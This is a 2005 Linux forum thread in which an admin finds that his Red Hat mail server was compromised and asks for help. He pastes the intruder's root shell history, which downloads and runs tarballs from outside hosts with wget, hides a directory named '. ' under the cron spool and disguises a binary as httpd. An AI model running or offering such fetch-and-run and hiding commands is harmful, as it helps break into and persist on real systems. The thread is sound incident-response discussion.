Find the answer to your Linux question:
Results 1 to 5 of 5
Hey folks, Recently my linux box has started giving me a strange error (at least to me it's strange). Whenever I use /etc/init.d/<servicename> <start/stop/status> I get the following error before ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. 06-13-2005 #1
    BananaBob
    BananaBob is offline
    Just Joined!
    Join Date
    Jun 2005
    Posts
    6

    SWAPD bad ELF interpreter

    Hey folks,

    Recently my linux box has started giving me a strange error (at least to me it's strange). Whenever I use /etc/init.d/<servicename> <start/stop/status> I get the following error before it goes ahead and does what it's supposed to:

    sh: /usr/bin/(swapd): /lib/ld-linux.so.1: bad ELF interpreter: No such file or directory

    Now I have not made any recent modifications to this box (that I can remember) and I believe I just started getting this error one day without any precursor activity on my part.

    I looked for the /lib/ld-linux.so.1 file which I obviously could not find. I did find /lib/ld-linux.so.2 though.

    Also, I use PUTTY to admin and I now notice all my softlinks are highlighted in RED, but they still seem to work. As you can tell, I'm just a part time admin so please excuse the technical ignorance.

    Running rh 8, sendmail, apache, squirrelmail. It's a Mail server.

    Everything seems to still be working, I'm just getting this error.

    Scanning through the history of root commands I came across some commands I don't recognize as having entered them myself:

    466 wget www.stadion.home.ro/muie.tgz
    467 tar -zxvf muie.tgz
    468 cd muie
    469 ./install

    and

    473 wget www.stadion.home.ro/muie.tgz
    474 tar -zxvf muie.tgz
    475 cd muie
    476 ./install

    and

    480 ifconfig -a
    481 cd /var/spool
    482 ls -la
    483 cd cron
    484 ls -la
    485 mkdir crontabs
    486 cd crontabs
    487 mkdir ". "
    488 cd ". "
    489 crontabs
    490 wget www.Icky.home.ro/mil2.tar
    491 tar xvf mil2.tar
    492 rm -rf mil2.tar
    493 cd mil
    494 ls -la
    495 pico
    496 vi muhrc
    497 mv init httpd
    498 export PATH:=PATH
    499 export PATH=:PATH
    500 httpd

    I'm begining to think I may have been hacked. Anyone have any input for me how to resolve my issue, and perhaps can put my fears to rest?

    Going to look into these commands further as I just noticed this as I was typing this message.

    Jz.
    Reply With Quote Reply With Quote
  2. 06-13-2005 #2
    jaboua
    jaboua is offline
    Linux Engineer
    Join Date
    Mar 2005
    Posts
    1,431
    ld-linux.so.1 is usually just a symlink; if you type in this command we may find out what the link is supposed to point to, if the target exists anymore at all (the symlinks usually get red if the targets cant be found)
    Code:
    ls -l /lib/ld*
    Reply With Quote Reply With Quote
  3. 06-13-2005 #3
    BananaBob
    BananaBob is offline
    Just Joined!
    Join Date
    Jun 2005
    Posts
    6
    Well, I tried that and I get this:

    -rwxr-xr-x 1 root root 87341 Sep 5 2002 /lib/ld-2.2.93.so
    lrwxrwxrwx 1 root root 12 Sep 29 2004 /lib/ld-linux.so.2 -> ld-2.2.93.so

    If I create a symbolic link of ld-linux.so.1 to point to ld-2.2.93.so everything goes kaput. I delete the link and I'm back to a functioning system with the error.

    Ok, now, I have determined that I was definitely hacked. It looks like the slug installed some applications and was using my system to possibly hack other systems. I tgz the files, that I found, that he apparently placed on my server. I'm not sure exactly what they do, but perhaps one of ya might be interested in helping me figure this out.

    I'm guessing that something he installed improperly upgraded (or downgraded) my ld installation so that his programs would work. This probably causes my problems. When I list out the /lib directory I get a large amount of RED hightligthed symlinks. Not sure what I should be doing at this point. I changed the root pw, and some other pws, disabled rsh (which I wasn't aware was enabled), only using ssh now. The box is behind a router with port forwarding so not sure how he got it other than through ssh anyway (there are other possible avenues through local Windows PC holes that I recently tightened down). It appears this attack happened in Apr, but just started doing things on Jun 1.

    Gads... Any help appreciated.

    Jz.
    Reply With Quote Reply With Quote
  4. 06-13-2005 #4
    BananaBob
    BananaBob is offline
    Just Joined!
    Join Date
    Jun 2005
    Posts
    6
    Just one more note, all these RED highlighted symlinks that are showing up seems to work just fine, and for most all of these RED highlighted symlinks, the files they point to do exists.

    Very strange. Any help appreciated.

    Jz.
    Reply With Quote Reply With Quote
  5. 06-14-2005 #5
    jaboua
    jaboua is offline
    Linux Engineer
    Join Date
    Mar 2005
    Posts
    1,431
    Maybe you can try installing an ld 1 version as well? Here's my output:
    Code:
    bash-2.05b$ ls -l /lib/ld*
-rwxr-xr-x  1 root root 95452 May 28 23&#58;21 /lib/ld-2.3.4.so
lrwxrwxrwx  1 root root    18 Jun  4 05&#58;22 /lib/ld-linux.so.1 -> ld-linux.so.1.9.11
-rwxr-xr-x  1 root root 22800 Jun  4 05&#58;22 /lib/ld-linux.so.1.9.11
lrwxrwxrwx  1 root root    11 May 28 23&#58;22 /lib/ld-linux.so.2 -> ld-2.3.4.so
    BTW, about hackers, here's something you should read: http://www3.ca.com/securityadvisor/v...ln.aspx?ID=402

    A vulnerability exists within the Linux run-time linker that allows an attacker with local user privileges to execute arbitrary code as "root". The vulnerability in question only affects ld.so 1.9.2 - earlier versions do not have the same vulnerability.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules